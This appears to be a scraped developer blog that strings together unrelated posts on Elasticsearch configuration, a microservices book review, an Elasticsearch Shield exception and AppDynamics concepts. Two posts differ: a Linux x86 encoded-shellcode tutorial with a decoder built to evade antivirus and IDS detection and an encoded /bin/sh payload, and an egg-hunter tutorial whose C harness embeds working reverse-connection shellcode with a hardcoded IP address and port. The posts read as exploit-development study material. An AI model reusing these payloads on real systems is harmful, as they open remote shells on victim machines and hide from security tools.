ElasticSearch:How to enable scripting on the embedded server

The goalelastic

In this ticket I will present all the required steps in order to enable the scripting on an embedded elasticsearch server. I will not explain how to create and use an embedded server but if you need more infos you can read this ticket Embedded Elasticsearch Server for Tests.

If you execute a script within the embedded server the following exception will be thrown;

Caused by: java.lang.IllegalArgumentException: script_lang not supported [xxxxx]
    at  org.elasticsearch.script.ScriptService.getScriptEngineServiceForLang(ScriptService.java:211)

 Code changes

 The easiest way to create an embedded server is the following one:

 Node node = NodeBuilder.nodeBuilder()
              .local (true)
              .settings(
               //add settings here
               )
              .node ();

The problem with this approach is that the NodeBuilder.node() method it will create a node class with an empty list of plug-ins; see the NodeBuilder.node code:

   /*
    * Builds the node without starting it.
    */
    public Node build() {
        return new Node(settings.build());
    }
    //Node(Settings) constructor
     /**
     * Constructs a node with the given settings.
     *
     * @param preparedSettings Base settings to configure the node with
     */
     public Node(Settings preparedSettings) {
        this(InternalSettingsPreparer
                .prepareEnvironment(preparedSettings, null),
             Version.CURRENT,
             Collections.<Class<? extends Plugin>>emptyList());
     }

In order to create a node having a list of desired plug-ins the second constructor of the Node class should be used:

protected Node(
                Environment tmpEnv, 
                Version version, 
                Collection<Class<? extends Plugin>> classpathPlugins)

The problem with this (second) constructor is that it is protected so we will need to extend the Node class to be able to use the protected constructor and we will need to extend also the NodeBuilder class in order to use the new Node class.

And here is the code:

  //PluginNode class 
  private static class PluginNode extends Node {
      public PluginNode(Settings preparedSettings, List<Class<? extends Plugin>> plugins) {
         super(InternalSettingsPreparer.prepareEnvironment(preparedSettings, null), Version.CURRENT, plugins);
      }
  }

  //PluginNodeBuilder class
  public class PluginNodeBuilder extends NodeBuilder {
        private List<Class<? extends Plugin>> plugins = new ArrayList<>();
        
        public PluginNodeBuilder() {
            super();
        }
        //new method to add plug-ins       
        public PluginNodeBuilder addPlugin(Class<? extends Plugin> plugin) {
            plugins.add(plugin);
            return this;
        }

        @Override
        //use the new PluginNode to build a node 
        public Node build() {
            return new PluginNode(settings().build(), plugins);
        }
    };

And how to use the new node builder:

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local (true)
                .settings(
                 //add settings here
                 )
                .node ();

Enable scripting feature

Using the previous Java code it will not be sufficient to execute the scripts; you must also use the right settings at the server creation and add the (Maven) dependencies to your classpath.

Server settings

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local (true)
                .settings (Settings.settingsBuilder ()
                     ...
                     //this is common for all languages
                     .put ("script.inline", true)
                     //this are the settings for the groovy language
                     .put ("script.engine.groovy.inline.mapping", true)
                     .put ("script.engine.groovy.inline.search", true)
                     .put ("script.engine.groovy.inline.update", true)
                     .put ("script.engine.groovy.inline.plugin", true)
                     .put ("script.engine.groovy.inline.aggs", true)
                      
                     //this are the settings for the expression language
                     .put ("script.engine.expression.inline.mapping", true)
                     .put ("script.engine.expression.inline.search", true)
                     .put ("script.engine.expression.inline.update", true)
                     .put ("script.engine.expression.inline.plugin", true)
                     .put ("script.engine.expression.inline.aggs", true)

If you more details about all the possible settings options you can look to the ElasticSearch Scripting documentation.

Maven dependencies

For the expression language:

       <dependency>
            <groupId>org.apache.lucene</groupId>
            <artifactId>lucene-expressions</artifactId>
            <version>5.5.2</version>
            <scope>compile</scope>
        </dependency>

       <dependency>
            <groupId>org.elasticsearch.module</groupId>
            <artifactId>lang-expression</artifactId>
            <version>2.2.0</version>
            <scope>compile</scope>
        </dependency>

For the groovy language:

<dependency>
    <groupId>org.elasticsearch.module</groupId>
    <artifactId>lang-groovy</artifactId>
    <version>2.3.2</version>
</dependency>

ElasticSearch:How to programmatically update settings of an existing index

The goal of this ticket is to show how to update programmatically the settings of anelastic ElasticSeach index. I will take as example the ElaticSeachsynonyms. Imagine that for a specific index, you have the following synonyms settings:

 "analysis": {
      "filter": {
        "synonym_filter": {
          "type": "synonym",
          "ignore_case": true,
          "synonyms": [
            "Romania, RO",
            "Belgium, BE"
          ]
        }
      },
....

Now, imagine (also) that you want to add a new entry into the synonyms lists (“France, FR”). You could do this by using the ElasticSearch  REST interface (please go here if you want to know more Elasticsearch: updating the mappings and settings of an existing index) or you can use the Java API offered by ElasticSearch to do the same task programmatically:

//close the index before the update
client.admin().indices().close(new CloseIndexRequest(indexName));

//update the synonyms
client.admin().indices().prepareUpdateSettings(indexName).setSettings(
             Settings.builder()
                .put(
                        //setting prefix
                        "index.analysis.filter.synonym_filter",
                        //group name
                        "synonyms",
                        //settings
                        new String[] {"0", "1", "2"},
                        //values
                        new String []{
                                 "Romania,RO", 
                                 "Belgium,BE", 
                                 "France,FR"
                                      }
                       )
            ).get();

//open the index
client.admin().indices().open(new OpenIndexRequest(indexName));

 

Useful links:

ElasticSearch Doc – Update Indices Settings

(Unofficial) ElasticSearch Java API for the IndicesAdminClieant interface

(Unofficial) ElasticSearch Java API for the ImmutableSettings.Builder.put method

 

 

Book review: Building microservices (part 1)

This is the first part of the review of the Building Microservices book.

Chapter 1: Microservicesmicroservices

This first chapter is a quick introduction to microservices, the definition, the concept genesis and the key benefits. The microservices idea have emerged from the (new) ways of crafting software today, this new ways implies the use domain-driven design, the continuous delivery, the virtualization, the infrastructure automation and the small autonomous teams.

The author is defining the microservices as “small, autonomous services that work together”.

The key benefits of the microservices are:

  • technology heterogeneity; use the right tool for the right job.
  • resilience; because the microservices have service boundaries quite well defined the failures are not cascading, it’s easy to quick find and isolate the problem(s).
  • scaling; the microservices can be deployed and run independently, so it is possible to choose which microservices need special attention to be scaled accordingly.
  • ease of deployment; microservices are independent by nature so, it can be (re)deployed punctually.
  • optimizing for replaceability; due to autonomous characteristics, the microservices can be easily replaced with new versions.

Chapter 2: The Evolutionary Architect

This chapter is about the role of the architect in the new IT landscape; for the author the qualities of an IT architect a re the following ones: should have a vision and be able to communicate it very clearly, should have empathy so he could understand the impact of his decisions over the colleagues and customers, should be able to collaborate with the others in order to define and execute the vision,  should be adaptable so he can change the vision as the changing of requirements, should be autonomous so he could find the right balance between standardizing and enabling autonomy for the team.

For me this chapter it does not feet very well in the book because all the ideas (from the chapter) could very well be applied to monolithic systems also.

Chapter 3: How to model services

The goal of this chapter is to split the services in the right way by finding the boundaries between services. In order to find the right service boundaries, it must see the problem from the model point of view.

The author introduces the notion of bounded context, notion that was coined by Eric Evans’s in Domain-Driven Design book. Any domain consists of multiple bounded contexts, and residing within each are components that do not need to be communicated outside as well as things that should be shared externally with other bounded contexts. By thinking in terms of model, it is possible to avoid the tight coupling pitfall. So, the each bounded context represents an ideal candidate for a microservice.

This cut on the bounded context is rather a vertical slice but in some situation due to technical boundaries, the cut can be done horizontally.

Chapter 4: Integration

All the ideas of this chapter are around 3 axes; inter-microservices integration, user interface integration with microservices and the COTS (Commercial Off the Shelf Software) integration with microservices.

For the inter-microservices integration different communications styles (synchronous versus asynchronous), different ways to manage (complex) business processes (orchestration versus choreography) and technologies (RPC, SOAP, REST) are very carefully explained with all the advantages and drawbacks. The author tend to prefer the asynchronous-choreographic using REST style, but he emphases that there is no ideal solution.

Then some integration issues are tackled; the service versioning problem or how to (wisely) reuse the code between microservices and/or client libraries and no fit all solution is proposed, just different options.

For the user interface integration with microservices some interesting ideas are presented, like the creation of a different backend api if your microservices are used by different ui technologies (create a backend api for the mobile application and a different backend api for the web application). Another interesting idea is to have services directly serving up UI components.

 The integration of microservices and the COTS part is around the problems that a team should solve in order to integrate with COTS; lack of control (the COTS could use a different technological stack that your microservices), difficult customization of COTS.

Chapter 5: Splitting the Monolith

The goal of this chapter is to presents some ideas about how to split a monolithic application into microservices. The first proposed step is to find portions of the code that can be treated in isolation and worked on without impacting the rest of the codebase (this portions of code are called seams, this word have been coined by Michael Feather in Working Effectively with Legacy Code). The seams are the perfect candidates for the service boundaries.

In order to easily refactor the code to create the seams the authors is advertising the Structure101 application which is an ADE (Architecture Development Environment); for alternatives to Structure 101 you can see Architecture Development Environment: Top 5 Alternatives to Structure101

 The rest of the chapter is about how to find seams in the database and into the code that is using it. The overall idea is that every microservice should have his own independent (DB) schema. Different problems will raise if this happens like the foreign key relationship problem, share of static data stored in the DB, shared tables, the transactional boundaries. Each of this problem is discussed in detail and multiple solutions are presented.

The author recognize that splitting the monolith it’s not trivial at all and it should start very small (for the DB for example a first step would be to split the schema and keep the code as it was before, the second step would be to migrate some parts of the monolithic code towards microservices). It also recognize that sometimes the splitting brings new problems (like the transactional boundaries).

Chapter 6: Deployment

This chapter presents different deployment techniques for the micro services. The first topic that is tackled is how the micro services code should be stored and how the Continuous Integration (CI) process should work; multiple options are discussed: one code repository for all micro services, and one CI server; one code repository by micro service and one CI server, build pipelines by operating system or by directly platform artifacts.

A second topic around the deployment is about the infrastructure on which the micro services are deployed. Multiple deployment scenarios are presented: all micro services deployed on same host, one micro service by host, virtualized hosts, dockerized hosts. The most important idea on this part is that all the deployment and the host creation should be automate; the automation is essential for keeping the team/s productive.

 

 

How to write a (Linux x86) custom encoded shellcode

Goal

Very often the shellcode authors will try to obfuscate the shellcode in order to bypass the ids/ips or the anti-viruses. This kind of shellcode is often call an “encoded shellcode”.  The goal of this ticket is to propose an (rather simple) encoding schema and the decoding part written in assembler.

What is an encoded shellcode

An encoded shellcode is a shellcode that have the payload encoded in order to escape the signature based detection. To work correctly the shellcode must initially decode the payload and then execute it. For a very basic example you can check the A Poor Man’s Shellcode Encoder / Decoder video.

(My) custom encoder

The encoding schema that I propose is the following one:

  • the payload is split in different blocks of random size between 1 and 9 bytes.
  • the first octet of each block represents the size of the original block.
  • the last character of the last block is a special character represented a terminal (0xff).

Supposing that the payload is something like:

0xaa,0xbb,0xcc,0xdd,0xee

One possible encoding version could be:

0x02,0xaa,0xbb,0x01,0xcc,0x03,0xdd,0xee,0xff

or

0x04,0xaa,0xbb,0xcc,0xdd,0x02,0xee,0xff

or

0x09,0xaa,0xbb,0xcc,0xdd,0xee,0xff

If you want to play with this encoding schema you can use the Random-Insertion-Encoder.py program that will write to the console the encoded shellcode for a specific shellcode.

(My) custom decoder

So, initially the payload will be encoded (with the custom shema) and when the shellcode is executed, in order to have a valid payload, the decoder should be executed. The decoder will decode the payload and then pass the execution to the payload.

The first problem that the decoder should solve is to find the memory address of the encoded payload. In order to do this, we will use the “Jump Call Pop” mechanism explained in the Introduction to Linux shellcode writing (Part 2) (paragraph 5.1 ).

The  skeleton of the decoder will look like:

global _start 
section .text
_start:
 jmp short call_shellcode
decoder:
 ; the top of the stack contains the
 ; address of the EncodedShelcode
 
 ; decoder code
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,.........,0xff

 A few words before showing you the code of the decoder. The decoder basically moves bytes from the right toward the left and skip the first byte of each block until the terminal byte is found. For the move of the bytes the lodsb and stosb instructions are used. These instructions are using the ESI (lodsb) and EDI (stosb) registers, so you can see ESI as a source register and EDI as a destination register.

The DL register is used as block bytes counter and the CL register contains the content of the first byte of each block. So, in order to know if all the bytes of a block had been copied a comparison between DL and CL is done.

A special care should be take before the ESI register is incremented; either manually or automatically by the lodsb instruction. A check should be done if the ESI points to the terminator byte and stop the copy otherwise the decoder will try to read memory locations that do not have access (and the program will stop with a core dumped exception).

So, here is the code of the decoder:

global _start 
section .text
_start:
 jmp short call_shellcode

decoder:
 ;get the adress of the shellcode
 pop esi

 ;allign edi and esi
 lea edi, [esi]

handle_next_block:
 ;check that the esi do not point
 ;to the terminator byte
 xor ecx,ecx
 mov cl, byte[esi]
 mov bl , cl
 xor bl, 0xff

 ;if esi points to terminator byte
 ;then execute the shellcode
 jz short EncodedShellcode

 ;otherwise then ship next byte
 ;because it's the first byte
 ;of the block and it contains
 ;the number of bytes that
 ;the block contains.
 inc esi
 
 ;dl it is used to count the
 ;number of bytes from a block
 ;already copied
 xor edx, edx
 
handle_next_byte:
 ;check that the esi do not point
 ;to the terminator byte
 mov bl, [esi]
 xor bl, 0xff
 
 ;if esi points toterminator byte
 ;then execute the shellcode
 jz short EncodedShellcode
 
 ;otherwise copy the byte pointed by
 ;esi to the location pointed by edi;
 ;esi is automatically incremented by
 ;the lodsb and edi by stosb
 lodsb
 stosb
 
 ;one more byte of the block had been copied
 ;so increment the counter
 inc dl
 
 ;check that all the bytes of the block
 ;have been copied;
 ;cl contains the first byte of the block
 ;representing the number of bytes of the
 ;block and dl contains the number of
 ;block bytes already copied
 cmp cl, dl
 
 ;if not zero then not all the block bytes
 ;have been copied
 jnz handle_next_byte
 
 ;otherwise go to the next block
 jmp handle_next_block
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x09,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x01,0x50,0x07,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0x01,0xcd,0x09,0x80,0xff

How to test the shellcode

In order to test the shellcode you must follow the next steps:

All the source codes presented in this ticket can be found here: gitHub.

Bibliography

How to fix ElasticSearch client exception “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_”

This ticket explains a possible solution  for the “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_” exception when a Java ElasticSearch client tries to connect to a (ElasticSearch) cluster using Shield.

Environment

ElasticSearch version: 1.7.3

Shield version: 1.3.3

Context

The way to connect a Java ElasticSearch client to a cluster using Shield is quite straightforward; you can see the ElasticSearch documentation. The most important part (at least in the context of this problem) is the creation of the Settings instance:

Settings settings = ImmutableSettings.settingsBuilder()
                .put("cluster.name", clusterName)
                .put("shield.ssl.keystore.path", jksPath)
                .put("shield.ssl.keystore.password", jksPassword)
                .put("shield.transport.ssl", "true")
                .put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")
                .build();
......

When the client is executed, the following strange stacktrace is thrown:

Full stacktrace

1) A binding to org.elasticsearch.shield.transport.filter.IPFilter was already configured at _unknown_.
  at _unknown_
2) A binding to org.elasticsearch.shield.transport.ClientTransportFilter was already configured at _unknown_.
  at _unknown_
3) A binding to org.elasticsearch.shield.ssl.ClientSSLService was already configured at _unknown_.
  at _unknown_
4) A binding to org.elasticsearch.shield.ssl.ServerSSLService was already configured at _unknown_.
  at _unknown_
4 errors
       at org.elasticsearch.common.inject.internal.Errors.throwCreationExceptionIfErrorsExist(Errors.java:344)
       at org.elasticsearch.common.inject.InjectorBuilder.initializeStatically(InjectorBuilder.java:151)
       at org.elasticsearch.common.inject.InjectorBuilder.build(InjectorBuilder.java:102)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:93)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:70)
       at org.elasticsearch.common.inject.ModulesBuilder.createInjector(ModulesBuilder.java:59)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:195)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:125)

 

Root cause

The root cause of this problem is the line:

.put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")

If this line is removed then the problem is solved. This property should be exclusively used with the 2.0 version of Shield and not with  1.3.3 version.

The moral of this story ? First of all you should use the right version of the ElaticSearch documentation (in my case I was running the 1.7.3  version but I used the documentation for the 2.o). The second point is  that ElasticSearch API is not very user friendly (I even dare to say that is badly designed). I would preferred that ImmutableSettings.Builder class to have a put method with a Java enum as first parameter not a Java String.

AppDynamics Pro – basics

The goal of this ticket is to present and explain the basic notions of the AppDynamics Pro product.

  • Node – a node is the basic unit of processing that AppDynamics monitors. A node is instrumented by an AppDynamics agent.
  • Tier – a tier represents an instrumented service or multiple services that perform the exact same functionality. It represents a more logical view of the application.A tier is composed of one or multiple nodes.
  • Application – multiple tiers gathered together.
  • Business Transaction – represents a distinct logical user activity. The entire application traffic is organized in Business Transactions.
  • Transaction Snapshot -set of diagnostic data, taken at a certain point in time, for a specific Business Transaction across all the tiers though which the transaction has passed. The Transaction Snapshots are triggered periodically (every 10 minutes) or automatically for the slow and error business transactions.
  • Metrics -application performance informations sent from the App Server Agents and Machine Agents to the controller.
  • Baselines – set of metrics within a time range.
  • Baseline Deviations – degree of deviation from baseline at any given point in time and by default are calculated by a number of standard deviations above the average.
  • Service Endpoint – performance metrics focused on a particular service or set of services independent of business transactions.
  • Health Rule – defines a condition or set of conditions in terms of metrics. The condition compares the performance metrics that AppDynamics collects with some static or dynamic threshold that you define. If performance exceeds the threshold, a health rule violation event is triggered. There are two types of thresholds: Warning and Critical.
  • Diagnostic Session – the goal is to collect extra Transaction Snapshots for one or more Business Transactions for a period of time.
  • Events – emitted when the application state change. Eight type of events:
    • Health rules violation
    • Too many slow transactions
    • Too many errors
    • Code problems
    • Application changes
    • JVM and CLR (.NET) Crashes
    • AppDynamics Config Warnings
    • Discovery (new application, tier or done discovered)
  • Errors – AppDynamics treat as errors the following events:
    • unhandled exceptions
    • HTTP error codes from 400 to 505 (the error codes to catch are configurable)
    • Error or Fatal logging events (Log4j or java.util.logging)
  • Information Points – collects metrics outside the context of Business Transactions and across several Business Transactions. For me it looks similar with the Service Endpoints.
  • Data Collectors – collects extra-information at the Business Transaction level like application code arguments, return values, and variables and displays the information in the Call Drill Down panels. There are two types of Data Collectors : method invocation date collectors and HTTP data collectors.

How to write a (Linux x86) egg hunter shellcode

Goal

The goal of this ticket is to write an egg hunter shellcode. An egg hunter is a piece of code that when is executed is looking for another piece of code (usually bigger) called the egg and it passes the execution to the egg. This technique is usually used when the space of executing shellcode is limited (the available space is less than the egg size) and it is possible to inject the egg in another memory location. Because the egg is injected in a non static memory location the egg must start with an egg tag in order to be recognized by the egg hunter.

1. How to test the shellcode

Maybe it will look odd but I will start by presenting the program that it will be used to test the egg hunter. The test program is a modified version of the shelcode.c used in the previous tickets.

#include<stdio.h>
#include<string.h>

#define EGG_TAG "hex version of egg_tag; to be added later"
unsigned char egg_hunter[]= "hex version of egg_hunter; to be added later";
unsigned char egg[] = EGG_TAG EGG_TAG "hex version of egg; to be added later";
main()
{
    int (*ret)() = (int(*)())egg_hunter;
    ret();
}

We start by defining the egg tag, the egg hunter and the egg; the egg is prefixed twice with the egg tag in order to be recognized by the egg hunter. The main program it will just pass the execution to the egg hunter that will search for the egg (which is somewhere in the memory space of the program) and then it will pass the execution to the egg. 

Usually the egg tag is eight bytes and the reason the egg tag repeats itself is because it allows the egg hunter to be more optimized for size so it can search for a single tag that has the same four byte values, one right after the other. This eight byte version of the egg tag tends to allow for enough uniqueness that it can be easily selected without running any high risk of a collision.

2 Implementation

2.1 Define the egg tag

Defining the egg tag is quite easy;  finally it’s up to you to choose a rather unique word. In our case the egg tag is egg1. In order to be used by the egg hunter the tag must be transformed in HEX. I just crafted a small script: fromStringToAscii.sh that will transform the input from char to ASCII equivalent and then to HEX value. So in our case the egg tag value will be 0x31676765.

2.2 Implement the egg hunter

What the egg hunter implementation should do, is firstly find the addressable space allocated to the host process( the process in which the egg hunter is embedded) then, search inside this addressable space for the egg and finally pass the execution to the egg.

On Linux this behavior can be achieved using the access (2) system call. The egg hunter will call systematically access system call in order to find the memory pages that the host process have access and once one accessible page is found, then it looks for the egg. Here is the implementation code:

global _start
section .text
_start:
 xor edx,edx
next_page:
 or dx,0xfff
next_adress:
 ;fill edx with 0x1000=4096 
 ;which represents PAGE_SIZE
 inc edx
 ;load the page memory address to ebx
 lea ebx,[edx+0x4]
 ;0x21=33 access system call number
 push byte +0x21
 pop eax
 int 0x80

 ;compare the result with EFAULT
 cmp al,0xf2
 jz next_page 
 mov eax,0x31676765; this is the egg marker: egg1 in hex
 mov edi,edx
 ;search for the first occurrence of the egg tag
 scasd
 jnz next_adress
 ;search for the second occurrence of the egg tag 
 scasd
 jnz next_adress
 ;execute the egg 
 jmp edi

A much detailed explanation of how this egg hunter work can be found in the Safely Searching Process Virtual Address Space.

3.Putting all together

Now, we have all the missing pieces so we could try to put them together. As egg I used a the reverse connection shellcode from the How to write a reverse connection shellcode. The final result it is something like:

#include<stdio.h>
#include<string.h>

#define PORT_NUMBER "\x6a\xff" // 0xffff
#define IP_ADDRESS "\x0c\x12\x01\x17"
#define EGG_TAG "\x65\x67\x67\x31"

unsigned char egg_hunter[]=
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\
xcd\x80\x3c\xf2\x74\xee\xb8"
EGG_TAG
"\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7";

unsigned char egg[] = 
EGG_TAG
EGG_TAG
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xcd\x80\x89\xc6\xe8\x01
\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\x68"
IP_ADDRESS
"\x66"
PORT_NUMBER
"\x66\x6a\x02\x89\xe1\xb3\x03\x6a\x10\x51\x56\x89\xe1\xcd\x80\xe8\x01\x00\x00\x00
\xc3\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x31\xc9\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89
\xf3\x41\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41\x41\xcd\x80\xe8\x01\x00\x00
\x00\xc3\x31\xc0\x31\xdb\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\xc3\xe8\x78\xff\xff\xff";
main()

{
 printf("EggHunter Length: %d\n", strlen(egg_hunter));
 printf("Shellcode Length: %d\n", strlen(egg));
 int (*ret)() = (int(*)())egg_hunter;
 ret();
}

All the source codes explained presented in this ticket can be found here: gitHub.

Bibliography